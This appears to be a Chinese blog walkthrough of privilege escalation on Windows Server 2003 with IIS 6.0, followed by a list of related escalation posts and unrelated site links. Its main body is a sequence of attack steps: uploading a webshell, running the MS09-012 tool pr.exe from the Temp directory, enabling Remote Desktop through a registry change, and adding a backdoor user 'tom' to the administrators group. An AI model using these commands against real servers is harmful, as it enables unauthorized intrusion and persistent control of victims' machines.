Windows2003系统漏洞提权复现
操作系统: Microsoft Windows Server 2003
Web服务器: IIS V6.0
第一步,将大马文件上传至服务器根目录
第二步,访问大马文件,进入大马的控制界面
第三步,查看漏洞补丁信息
第四步,上传漏洞工具
将提权工具( 此处使用MS09-012漏洞工具 )上传到系统中,windows系统的回收站和c:\windows\Temp目录默认具有上传和执行的权限
第五步,利用工具进行提权
payload
/c c:\windows\temp\pr.exe "whoami"
第六步,开启远程桌面端口
命令行查看是否开启3389( 远程桌面 )端口
/c c:\windows\temp\pr.exe "netstat -ano"
上传a.bat文件至c:\windows\temp目录下,内容为开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
执行a.bat文件,开启3389端口
/c c:\windows\temp\pr.exe "c:\windows\temp\a.bat"
查看3389是否开启成功
/c c:\windows\temp\pr.exe "netstat -ano"
第七步,添加管理员权限用户
添加普通用户tom
/c c:\windows\temp\pr.exe "net user tom 123456 /add"
将tom添加至administrators,拥有管理员权限
/c c:\windows\temp\pr.exe "net localgroup administrators tom /add"
第八步,物理机连接远程桌面
Windows2003系统漏洞提权复现相关推荐
- Linux脏牛漏洞提权复现
操作系统: Linux ( CentOS 6.5) Web服务: PHP+Apache 环境搭建 第一步,配置yum源,安装PHP 进入yum目录 cd /etc/yum.repos.d/ 创建文件夹 ...
- 103.网络安全渗透测试—[权限提升篇1]—[Linux内核漏洞提权]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.LINUX 内核漏洞提权 1.漏洞背景: 2.漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME ...
- 操作系统权限提升(三)之Windows系统内核溢出漏洞提权
系列文章 操作系统权限提升(一)之操作系统权限介绍 操作系统权限提升(二)之常见提权的环境介绍 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!! Windows系统内核溢出漏洞提权介绍 ...
- 【内网—权限提升】——linux本地提权_脏牛漏洞提权
文章目录 一.实验目的: 二.工具: 三.实验环境: 四.漏洞说明: 1. 原理: 2. 漏洞成因: 五.环境准备: 1. 安装Apache及php环境: 2. 安装gcc编译器(C语言编译器): 2 ...
- PR、巴西烤肉、iis6.0提权复现
PR.巴西烤肉.iis6.0提权复现 大多数的时候,如果我们上传了一句话木马之后,想要进一步操作.比如,创建新用户,查看当前身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限, ...
- 系统内核溢出漏洞提权
系统内核溢出漏洞提权是一种通用的提权的方法,攻击者通常可以使用该方法绕过系统的所有安全限制.攻击者利用该漏洞的关键是目标系统没有及时安装补丁. 存在局限性:如果目标系统的补丁更新工作较为迅速和完善,那 ...
- 2023年中职网络空间安全 Linux系统渗透提权
B-3:Linux系统渗透提权 任务环境说明: 服务器场景:Server2204(关闭链接) 用户名:hacker 密码:123456. 1.使用渗透机对服务器学信息收集,并将服务器中S ...
- linux系统漏洞firefart,CVE-2016-5195脏牛Linux提权复现
漏洞编号:CVE-2016-5195 影响范围: Linux kernel >= 2.6.22(2007年发行,到今年10月18日才修复) 漏洞影响:低权限用户利用该漏洞技术可以在全版本Linu ...
- 〖EXP〗Ladon打印机漏洞提权CVE-2021-1675复现
基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞,漏洞CVE编号:CVE-2021-1675.未经身份验证的远程攻 ...
最新文章
- python flask 设置 header 响应体、响应头、状态码
- 如何识别一个指针式的时种的时间?
- Android or iOS 运行 meteor App 屏幕一片空白 White screen的解决方法
- js 单页面ajax缓存策略,浅谈ajax的缓存机制---IE浏览器方面
- 无服务器革命:好,坏和丑
- .Net Core Swagger:Actions require an explicit HttpMethod binding for Swagger 2.0
- legend函数_ggplot的图例(legend)管理
- java script 环境搭建_TypeScript环境搭建
- Learn RxJava
- Centos7 Zabbix3.2安装(yum)
- 一步步学习SPD2010--第十二章节--理解可用性和可接入性(5)--测试可用性
- Flutter之播放视频
- abb机器人工具坐标系设定方式_设定abb机器人工具坐标的方法
- Java通过JNI/JNA加载dll库文件调用C接口,出现“java.lang.UnsatisfiedLinkError:包名.类.方法(参数)”问题
- html5增加用户代码,HTML5 用户注册页面源代码
- 河北计算机应用对口升学,2019年河北省中等职业学校对口升学考试:计算机文化基础+计算机应用基础模拟试卷...
- wincc与第三方软件opc通讯_运用OPC实现WinCC与西门子SIMOTION的通讯
- 微生物组-扩增子16S分析和可视化(2023.2)
- 不同速度流体的剪切形成不同尺度的漩涡,看起来很像分形。
- 一、CPU寄存器说明
热门文章
- DIY可视化导出uni-app源码生成器
- 在linux下编译运行c语言程序
- Excel - 学习 - 笔记6: Excel 函数 - filter 函数
- java中的saturn_saturn java 热加载(一)
- 手机无法连接电脑的手机助手
- mmdetection2使用教程
- 服务器自检后显示scsi,SCSI RAID卡常见故障分析及BIOS升级指导
- Linux学习5之查找文件中的某个字符串并返回所在行号
- 事件营销说到底就是抓住热点事件做营销
- 使用fake_useragent报错:fake_useragent.errors.FakeUserAgentError: Maximum amount of retries reached